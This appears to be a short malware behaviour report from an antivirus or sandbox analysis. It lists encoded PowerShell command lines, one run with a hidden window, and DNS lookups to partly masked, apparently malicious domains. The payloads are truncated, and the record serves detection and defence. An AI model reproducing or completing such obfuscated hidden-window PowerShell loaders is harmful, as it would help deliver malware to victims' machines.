Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASQB3AGoAZQBzAG0AcgBwAGMAbgAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBKAHUAZQBvAHgAcgBvAG8AIAAjAD4AIAAkAFQAeABlAHAAcABpAGQAagBnAHMAeQBqAHgAPQAnAEcAegBp...
- DNS ASK ev###.#zurewebsites.net
- DNS ASK pr#####.groupemfadel.com
- DNS ASK ne#.##rnsleth.com
- DNS ASK te##.#artelt-fm.com
- DNS ASK sp###.technode.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASQB3AGoAZQBzAG0AcgBwAGMAbgAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBKAHUAZQBvAHgAcgBvAG8AIAAjAD4AIAAkAFQAeABlAHAAcABpAGQAagBnAHMAeQBqAHgAPQAnAEcAegBp...' (with hidden window)